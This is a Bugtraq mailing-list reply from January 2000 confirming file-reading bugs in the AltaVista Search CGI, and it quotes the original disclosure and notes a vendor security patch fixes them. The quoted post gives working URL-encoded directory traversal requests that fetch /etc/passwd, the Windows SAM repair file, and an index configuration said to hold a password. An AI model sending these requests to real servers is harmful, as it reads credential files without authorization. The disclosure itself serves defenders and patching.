Re: Altavista followup

[Guy.Roelandts () COMPAQ COM (Roelandts, Guy)]

Hi Rudi,

   Just tried to reproduce the bugs you were talking about, and I can
 confirm that they exist without their secpatch and that they are gone
 after having installed the secpatch.

Guy ROELANDTS
Compaq EMEA

> -----Original Message-----
> From: rudi carell [mailto:rudicarell () HOTMAIL COM]
> Sent: Sunday, January 09, 2000 4:37 PM
> To: BUGTRAQ () SECURITYFOCUS COM
> Subject: Altavista followup
>
>
> hola,
>
> more bugs in the AV-Search thing ..
>
> using uri-encoded strings it is possible to view "any" file
> on the system ..
>
> examples:
>
> unixxxsss ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/
etc/passwd

or on an micro$oft IIS ...

http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\r
epair\\sam._

interesting infos about the file structure ...

http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/inde
xer.log

or another file which does contain the password ..

http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/poli
cy.conf

altavista told me that this is(was) just a flavour of the "old" bug and its
fix is(was) included in the last secpatch.

whatever ....

nicedays:-/

RC
rudicarell () hotmail com